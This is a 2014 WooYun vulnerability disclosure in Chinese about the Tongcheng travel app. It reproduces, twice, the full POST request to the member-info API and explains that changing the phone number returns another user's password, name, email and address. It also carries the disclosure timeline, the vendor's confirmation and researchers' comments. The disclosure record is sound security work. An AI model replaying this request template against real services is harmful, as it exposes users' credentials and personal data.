当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048473

漏洞标题:同程网APP设计不当泄露用户大量资料

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 蜉蝣

提交时间:2014-01-10 13:32

修复时间:2014-04-10 13:32

公开时间:2014-04-10 13:32

漏洞类型:用户敏感数据泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-10: 厂商已经确认,细节仅向厂商公开
2014-01-13: 细节向第三方安全合作伙伴开放
2014-03-06: 细节向核心白帽子及相关领域专家公开
2014-03-16: 细节向普通白帽子公开
2014-03-26: 细节向实习白帽子公开
2014-04-10: 细节向公众公开

简要描述:

应该算是通用漏洞吧

详细说明:

APP登陆账号后 有个POST包

POST /MobileAPI/membership/membershiphandler.ashx HTTP/1.1
Accept-Encoding: gzip
Content-Type: application/json;charset=utf-8
Content-Length: 428
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-I9100G Build/IMM76D)
Host: tcmobileapi.17usoft.com
Connection: Keep-Alive
{"request":{"body":{"clientInfo":{"clientIp":"192.168.0.103","deviceId":"354016054666357","pushInfo":"","refId":"18241320","versionNumber":"5.3.0","versionType":"android"},"memberId":"27581001","loginName":"13999999999"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","digitalSign":"47db96e89b881b671ca4dda938198ca6","reqTime":"2014-01-10 12:41:49.070","serviceName":"QueryMemberInfo","version":"20111128102912"}}}


QQ图片20140110125040.jpg

修改13999999999改为指定手机即可获取该手机号对应的memberId loginName password oldPassword userName" trueName email mobile phone sex province city postCode address msn qq memberType..........

漏洞证明:

APP登陆账号后 有个POST包

POST /MobileAPI/membership/membershiphandler.ashx HTTP/1.1
Accept-Encoding: gzip
Content-Type: application/json;charset=utf-8
Content-Length: 428
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-I9100G Build/IMM76D)
Host: tcmobileapi.17usoft.com
Connection: Keep-Alive
{"request":{"body":{"clientInfo":{"clientIp":"192.168.0.103","deviceId":"354016054666357","pushInfo":"","refId":"18241320","versionNumber":"5.3.0","versionType":"android"},"memberId":"27581001","loginName":"13999999999"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","digitalSign":"47db96e89b881b671ca4dda938198ca6","reqTime":"2014-01-10 12:41:49.070","serviceName":"QueryMemberInfo","version":"20111128102912"}}}


QQ图片20140110125040.jpg

修改13999999999改为指定手机即可获取该手机号对应的memberId loginName password oldPassword userName" trueName email mobile phone sex province city postCode address msn qq memberType..........

修复方案:

不知道

版权声明:转载请注明来源 蜉蝣@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-01-10 17:25

厂商回复:

感谢 @蜉蝣 正在修复中!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-10 14:26 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @xsser 难道跟我之前发的没重复~

  2. 2014-01-10 14:36 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @带馅儿馒头 不是一个接口 等公开看看吧

  3. 2014-01-10 17:21 | 忆闪而过 ( 路人 | Rank:26 漏洞数:6 | 寂寞在唱歌)

    @带馅儿馒头 没重复。是你漏掉的

  4. 2014-01-10 17:31 | 蜉蝣 ( 实习白帽子 | Rank:93 漏洞数:24 )

    确认真快